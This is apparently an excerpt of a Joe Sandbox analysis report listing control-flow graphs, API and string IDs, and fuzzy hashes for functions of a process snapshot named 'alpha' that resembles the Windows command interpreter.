7ff7d151ae66-7ff7d151ae6d 380->382 381->378 382->382 383 7ff7d151ae6f-7ff7d151ae77 382->383 383->257 384 7ff7d151ae7d-7ff7d151ae97 call 7ff7d15213e0 383->384 387 7ff7d151ae9a-7ff7d151aea4 384->387 388 7ff7d151aebc-7ff7d151aef8 call 7ff7d1520a6c call 7ff7d151ff70 * 2 387->388 389 7ff7d151aea6-7ff7d151aead 387->389 388->317 397 7ff7d151aefe 388->397 389->388 391 7ff7d151aeaf-7ff7d151aeba 389->391 391->387 391->388 397->284
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :$:$:$:ON$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 972821348-467788257
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a1cad378b9ebd1b9c19244478a5c33789b3475cf11d36777d6b64c224af23755
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1229222A0868B86FB66BF21951427DF6A1EF45B80FC98077D90F473B4DEBDA4448370
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15251EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 398 7ff7d15251ec-7ff7d1525248 call 7ff7d1525508 GetLocaleInfoW 401 7ff7d152524e-7ff7d1525272 GetLocaleInfoW 398->401 402 7ff7d152ef32-7ff7d152ef3c 398->402 404 7ff7d1525274-7ff7d152527a 401->404 405 7ff7d1525295-7ff7d15252b9 GetLocaleInfoW 401->405 403 7ff7d152ef3f-7ff7d152ef49 402->403 406 7ff7d152ef4b-7ff7d152ef52 403->406 407 7ff7d152ef61-7ff7d152ef6c 403->407 408 7ff7d15254f7-7ff7d15254f9 404->408 409 7ff7d1525280-7ff7d1525286 404->409 410 7ff7d15252bb-7ff7d15252c3 405->410 411 7ff7d15252de-7ff7d1525305 GetLocaleInfoW 405->411 406->407 414 7ff7d152ef54-7ff7d152ef5f 406->414 417 7ff7d152ef75-7ff7d152ef78 407->417 408->402 409->408 415 7ff7d152528c-7ff7d152528f 409->415 416 7ff7d15252c9-7ff7d15252d7 410->416 410->417 412 7ff7d1525307-7ff7d152531b 411->412 413 7ff7d1525321-7ff7d1525343 GetLocaleInfoW 411->413 412->413 418 7ff7d1525349-7ff7d152536e GetLocaleInfoW 413->418 419 7ff7d152efaf-7ff7d152efb9 413->419 414->403 414->407 415->405 416->411 420 7ff7d152ef99-7ff7d152efa3 417->420 421 7ff7d152ef7a-7ff7d152ef7d 417->421 422 7ff7d152eff2-7ff7d152effc 418->422 423 7ff7d1525374-7ff7d1525396 GetLocaleInfoW 418->423 425 7ff7d152efbc-7ff7d152efc6 419->425 420->419 421->411 424 7ff7d152ef83-7ff7d152ef8d 421->424 426 7ff7d152efff-7ff7d152f009 422->426 427 7ff7d152539c-7ff7d15253be GetLocaleInfoW 423->427 428 7ff7d152f035-7ff7d152f03f 423->428 424->420 429 7ff7d152efc8-7ff7d152efcf 425->429 430 7ff7d152efde-7ff7d152efe9 425->430 431 7ff7d152f00b-7ff7d152f012 426->431 432 7ff7d152f021-7ff7d152f02c 426->432 433 7ff7d152f078-7ff7d152f082 427->433 434 7ff7d15253c4-7ff7d15253e6 GetLocaleInfoW 427->434 435 7ff7d152f042-7ff7d152f04c 428->435 429->430 436 7ff7d152efd1-7ff7d152efdc 429->436 430->422 431->432 437 7ff7d152f014-7ff7d152f01f 431->437 432->428 442 7ff7d152f085-7ff7d152f08f 433->442 438 7ff7d15253ec-7ff7d152540e GetLocaleInfoW 434->438 439 7ff7d152f0bb-7ff7d152f0c5 434->439 440 7ff7d152f04e-7ff7d152f055 435->440 441 7ff7d152f064-7ff7d152f06f 435->441 436->425 436->430 437->426 437->432 446 7ff7d152f0fe-7ff7d152f108 438->446 447 7ff7d1525414-7ff7d1525436 GetLocaleInfoW 438->447 445 7ff7d152f0c8-7ff7d152f0d2 439->445 440->441 448 7ff7d152f057-7ff7d152f062 440->448 441->433 443 7ff7d152f0a7-7ff7d152f0b2 442->443 444 7ff7d152f091-7ff7d152f098 442->444 443->439 444->443 449 7ff7d152f09a-7ff7d152f0a5 444->449 450 7ff7d152f0ea-7ff7d152f0f5 445->450 451 7ff7d152f0d4-7ff7d152f0db 445->451 454 7ff7d152f10b-7ff7d152f115 446->454 452 7ff7d152543c-7ff7d152545e GetLocaleInfoW 447->452 453 7ff7d152f141-7ff7d152f14b 447->453 448->435 448->441 449->442 449->443 450->446 451->450 456 7ff7d152f0dd-7ff7d152f0e8 451->456 457 7ff7d1525464-7ff7d1525486 GetLocaleInfoW 452->457 458 7ff7d152f184-7ff7d152f18b 452->458 455 7ff7d152f14e-7ff7d152f158 453->455 459 7ff7d152f117-7ff7d152f11e 454->459 460 7ff7d152f12d-7ff7d152f138 454->460 461 7ff7d152f15a-7ff7d152f161 455->461 462 7ff7d152f170-7ff7d152f17b 455->462 456->445 456->450 464 7ff7d152548c-7ff7d15254ae GetLocaleInfoW 457->464 465 7ff7d152f1c4-7ff7d152f1ce 457->465 463 7ff7d152f18e-7ff7d152f198 458->463 459->460 466 7ff7d152f120-7ff7d152f12b 459->466 460->453 461->462 467 7ff7d152f163-7ff7d152f16e 461->467 462->458 468 7ff7d152f19a-7ff7d152f1a1 463->468 469 7ff7d152f1b0-7ff7d152f1bb 463->469 470 7ff7d152f207-7ff7d152f20e 464->470 471 7ff7d15254b4-7ff7d15254f5 setlocale call 7ff7d1528f80 464->471 472 7ff7d152f1d1-7ff7d152f1db 465->472 466->454 466->460 467->455 467->462 468->469 474 7ff7d152f1a3-7ff7d152f1ae 468->474 469->465 473 7ff7d152f211-7ff7d152f21b 470->473 476 7ff7d152f1dd-7ff7d152f1e4 472->476 477 7ff7d152f1f3-7ff7d152f1fe 472->477 478 7ff7d152f21d-7ff7d152f224 473->478 479 7ff7d152f233-7ff7d152f23e 473->479 474->463 474->469 476->477 481 7ff7d152f1e6-7ff7d152f1f1 476->481 477->470 478->479 482 7ff7d152f226-7ff7d152f231 478->482 481->472 481->477 482->473 482->479
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1351325837-2236139042
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2cfb79a8ca0fe75f2f9909264f8608b2b5a74e7f4394c3e4601b634e09182452
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20F15966B1864B85FB11AF11E9102BDA2A5BF05B84FE44177DA1F836B4EFBCE505C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 483 7ff7d1524224-7ff7d15242a5 InitializeProcThreadAttributeList 484 7ff7d15242ab-7ff7d15242e5 UpdateProcThreadAttribute 483->484 485 7ff7d152ecd4-7ff7d152ecee GetLastError call 7ff7d1539eec 483->485 486 7ff7d15242eb-7ff7d15243c6 memset * 2 GetStartupInfoW call 7ff7d1523a90 call 7ff7d151b900 484->486 487 7ff7d152ecf0-7ff7d152ed19 GetLastError call 7ff7d1539eec DeleteProcThreadAttributeList 484->487 492 7ff7d152ed1e 485->492 497 7ff7d1524638-7ff7d1524644 _local_unwind 486->497 498 7ff7d15243cc-7ff7d15243d3 486->498 487->492 499 7ff7d1524649-7ff7d1524650 497->499 498->499 500 7ff7d15243d9-7ff7d15243dc 498->500 499->500 503 7ff7d1524656-7ff7d152465d 499->503 501 7ff7d15243de-7ff7d15243f5 wcsrchr 500->501 502 7ff7d1524415-7ff7d1524424 call 7ff7d1525a68 500->502 501->502 504 7ff7d15243f7-7ff7d152440f lstrcmpW 501->504 509 7ff7d152442a-7ff7d1524486 CreateProcessW 502->509 510 7ff7d1524589-7ff7d1524590 502->510 503->502 506 7ff7d1524663 503->506 504->502 508 7ff7d1524668-7ff7d152466d call 7ff7d1539044 504->508 506->500 508->502 512 7ff7d152448b-7ff7d152448f 509->512 510->509 514 7ff7d1524596-7ff7d15245fa CreateProcessAsUserW 510->514 515 7ff7d1524672-7ff7d1524682 GetLastError 512->515 516 7ff7d1524495-7ff7d15244c7 CloseHandle call 7ff7d152498c 512->516 514->512 518 7ff7d152468d-7ff7d1524694 515->518 516->518 522 7ff7d15244cd-7ff7d15244e5 516->522 520 7ff7d15246a2-7ff7d15246ac 518->520 521 7ff7d1524696-7ff7d15246a0 518->521 523 7ff7d15246ae-7ff7d15246b5 call 7ff7d15297bc 520->523 526 7ff7d1524705-7ff7d1524707 520->526 521->520 521->523 524 7ff7d15244eb-7ff7d15244f2 522->524 525 7ff7d15247a3-7ff7d15247a9 522->525 541 7ff7d15246b7-7ff7d1524701 call 7ff7d156c038 523->541 542 7ff7d1524703 523->542 528 7ff7d15244f8-7ff7d1524507 524->528 529 7ff7d15245ff-7ff7d1524607 524->529 526->522 527 7ff7d152470d-7ff7d152472a call 7ff7d151cd90 526->527 543 7ff7d152472c-7ff7d1524738 _local_unwind 527->543 544 7ff7d152473d-7ff7d1524767 call 7ff7d15213e0 call 7ff7d1539eec call 7ff7d151ff70 _local_unwind 527->544 532 7ff7d152450d-7ff7d1524553 call 7ff7d1525cb4 call 7ff7d15233f0 call 7ff7d152498c 528->532 533 7ff7d1524612-7ff7d1524616 528->533 529->528 534 7ff7d152460d 529->534 566 7ff7d1524558-7ff7d152455e 532->566 539 7ff7d15247d7-7ff7d15247df 533->539 540 7ff7d152461c-7ff7d1524633 533->540 538 7ff7d152476c-7ff7d1524773 534->538 538->528 548 7ff7d1524779-7ff7d1524780 538->548 545 7ff7d15247f2-7ff7d152483c call 7ff7d151ff70 DeleteProcThreadAttributeList call 7ff7d1528f80 539->545 546 7ff7d15247e1-7ff7d15247ed CloseHandle 539->546 540->545 541->526 542->526 543->544 544->538 546->545 548->528 553 7ff7d1524786-7ff7d1524789 548->553 553->528 558 7ff7d152478f-7ff7d1524792 553->558 558->525 562 7ff7d1524794-7ff7d152479d call 7ff7d153a250 558->562 562->525 562->528 567 7ff7d15247ae-7ff7d15247ca call 7ff7d15233f0 566->567 568 7ff7d1524564-7ff7d1524579 call 7ff7d152498c 566->568 567->539 568->545 576 7ff7d152457f-7ff7d1524584 call 7ff7d153a920 568->576 576->545
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 388421343-2905461000
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 84bd1d350d77b01b83f0786bfcac9955e31c9004c3aea83c9bf83a4dcce896ce
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF13B32A18A8B85FB60AB01E4543BEF6A0FB85780FD44176D94F82675DFBCE445CB60
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 579 7ff7d1525554-7ff7d15255b9 call 7ff7d152a640 582 7ff7d15255bc-7ff7d15255e8 RegOpenKeyExW 579->582 583 7ff7d1525887-7ff7d152588e 582->583 584 7ff7d15255ee-7ff7d1525631 RegQueryValueExW 582->584 583->582 585 7ff7d1525894-7ff7d15258db time srand call 7ff7d1528f80 583->585 586 7ff7d1525637-7ff7d1525675 RegQueryValueExW 584->586 587 7ff7d152f248-7ff7d152f24d 584->587 591 7ff7d1525677-7ff7d152567c 586->591 592 7ff7d152568e-7ff7d15256cc RegQueryValueExW 586->592 589 7ff7d152f24f-7ff7d152f25b 587->589 590 7ff7d152f260-7ff7d152f265 587->590 589->586 590->586 594 7ff7d152f26b-7ff7d152f286 _wtol 590->594 595 7ff7d152f28b-7ff7d152f290 591->595 596 7ff7d1525682-7ff7d1525687 591->596 597 7ff7d15256d2-7ff7d1525710 RegQueryValueExW 592->597 598 7ff7d152f2b6-7ff7d152f2bb 592->598 594->586 595->592 601 7ff7d152f296-7ff7d152f2b1 _wtol 595->601 596->592 599 7ff7d1525729-7ff7d1525767 RegQueryValueExW 597->599 600 7ff7d1525712-7ff7d1525717 597->600 602 7ff7d152f2bd-7ff7d152f2c9 598->602 603 7ff7d152f2ce-7ff7d152f2d3 598->603 606 7ff7d1525769-7ff7d152576e 599->606 607 7ff7d152579f-7ff7d15257dd RegQueryValueExW 599->607 604 7ff7d152f2f9-7ff7d152f2fe 600->604 605 7ff7d152571d-7ff7d1525722 600->605 601->592 602->597 603->597 608 7ff7d152f2d9-7ff7d152f2f4 _wtol 603->608 604->599 613 7ff7d152f304-7ff7d152f31a wcstol 604->613 605->599 609 7ff7d152f320-7ff7d152f325 606->609 610 7ff7d1525774-7ff7d152578f 606->610 611 7ff7d152f3a9 607->611 612 7ff7d15257e3-7ff7d15257e8 607->612 608->597 614 7ff7d152f327-7ff7d152f33f wcstol 609->614 615 7ff7d152f34b 609->615 616 7ff7d152f357-7ff7d152f35e 610->616 617 7ff7d1525795-7ff7d1525799 610->617 624 7ff7d152f3b5-7ff7d152f3b8 611->624 618 7ff7d15257ee-7ff7d1525809 612->618 619 7ff7d152f363-7ff7d152f368 612->619 613->609 614->615 615->616 616->607 617->607 617->616 622 7ff7d152f39a-7ff7d152f39d 618->622 623 7ff7d152580f-7ff7d1525813 618->623 620 7ff7d152f36a-7ff7d152f382 wcstol 619->620 621 7ff7d152f38e 619->621 620->621 621->622 622->611 623->622 627 7ff7d1525819-7ff7d1525823 623->627 625 7ff7d152582c 624->625 626 7ff7d152f3be-7ff7d152f3c5 624->626 628 7ff7d1525832-7ff7d1525870 RegQueryValueExW 625->628 630 7ff7d152f3ca-7ff7d152f3d1 625->630 626->628 627->624 629 7ff7d1525829 627->629 631 7ff7d152f3dd-7ff7d152f3e2 628->631 632 7ff7d1525876-7ff7d1525882 RegCloseKey 628->632 629->625 630->631 633 7ff7d152f433-7ff7d152f439 631->633 634 7ff7d152f3e4-7ff7d152f412 ExpandEnvironmentStringsW 631->634 632->583 633->632 637 7ff7d152f43f-7ff7d152f44c call 7ff7d151b900 633->637 635 7ff7d152f428 634->635 636 7ff7d152f414-7ff7d152f426 call 7ff7d15213e0 634->636 639 7ff7d152f42e 635->639 636->639 637->632 639->633
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 145004033-3846321370
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 49f0bba741916081369efb74f02044f29ac6390f18ffb8293604677542a470ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FE13826529A8BC6F760AB10E4501BEF7A0FB99744FD05137EA8F42A64DFBCD544CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15237D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 821 7ff7d15237d8-7ff7d1523887 GetCurrentThreadId OpenThread call 7ff7d15204f4 HeapSetInformation RegOpenKeyExW 824 7ff7d152e9f8-7ff7d152ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7d152388d-7ff7d15238eb call 7ff7d1525920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7d152ea41-7ff7d152ea59 GetThreadLocale 824->827 825->827 831 7ff7d15238f1-7ff7d1523913 memset 825->831 829 7ff7d152ea5b-7ff7d152ea67 827->829 830 7ff7d152ea74-7ff7d152ea77 827->830 829->830 832 7ff7d152ea79-7ff7d152ea7d 830->832 833 7ff7d152ea94-7ff7d152ea96 830->833 834 7ff7d1523919-7ff7d1523935 call 7ff7d1524d5c 831->834 835 7ff7d152eaa5 831->835 832->833 836 7ff7d152ea7f-7ff7d152ea89 832->836 833->835 841 7ff7d152393b-7ff7d1523942 834->841 842 7ff7d152eae2-7ff7d152eaff call 7ff7d1513240 call 7ff7d1538530 call 7ff7d1524c1c 834->842 837 7ff7d152eaa8-7ff7d152eab4 835->837 836->833 837->834 840 7ff7d152eaba-7ff7d152eac3 837->840 843 7ff7d152eacb-7ff7d152eace 840->843 844 7ff7d1523948-7ff7d1523962 _setjmp 841->844 845 7ff7d152eb27-7ff7d152eb40 _setjmp 841->845 850 7ff7d152eb00-7ff7d152eb0d 842->850 846 7ff7d152ead0-7ff7d152eadb 843->846 847 7ff7d152eac5-7ff7d152eac9 843->847 849 7ff7d1523968-7ff7d152396d 844->849 844->850 851 7ff7d15239fe-7ff7d1523a05 call 7ff7d1524c1c 845->851 852 7ff7d152eb46-7ff7d152eb49 845->852 846->837 853 7ff7d152eadd 846->853 847->843 855 7ff7d15239b9-7ff7d15239bb 849->855 856 7ff7d152396f 849->856 864 7ff7d152eb15-7ff7d152eb1f call 7ff7d1524c1c 850->864 851->824 858 7ff7d152eb4b-7ff7d152eb65 call 7ff7d1513240 call 7ff7d1538530 call 7ff7d1524c1c 852->858 859 7ff7d152eb66-7ff7d152eb6f call 7ff7d15201b8 852->859 853->834 867 7ff7d152eb20 855->867 868 7ff7d15239c1-7ff7d15239c3 call 7ff7d1524c1c 855->868 863 7ff7d1523972-7ff7d152397d 856->863 858->859 878 7ff7d152eb87-7ff7d152eb89 call 7ff7d15286f0 859->878 879 7ff7d152eb71-7ff7d152eb82 _setmode 859->879 871 7ff7d15239c9-7ff7d15239de call 7ff7d151df60 863->871 872 7ff7d152397f-7ff7d1523984 863->872 864->867 867->845 883 7ff7d15239c8 868->883 871->864 889 7ff7d15239e4-7ff7d15239e8 871->889 872->863 880 7ff7d1523986-7ff7d15239ae call 7ff7d1520580 GetConsoleOutputCP GetCPInfo call 7ff7d15204f4 872->880 890 7ff7d152eb8e-7ff7d152ebad call 7ff7d15258e4 call 7ff7d151df60 878->890 879->878 898 7ff7d15239b3 880->898 883->871 889->851 893 7ff7d15239ea-7ff7d15239ef call 7ff7d151be00 889->893 902 7ff7d152ebaf-7ff7d152ebb3 890->902 899 7ff7d15239f4-7ff7d15239fc 893->899 898->855 899->872 902->851 903 7ff7d152ebb9-7ff7d152ec24 call 7ff7d15258e4 GetConsoleOutputCP GetCPInfo call 7ff7d15204f4 call 7ff7d151be00 call 7ff7d1520580 GetConsoleOutputCP GetCPInfo call 7ff7d15204f4 902->903 903->890
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
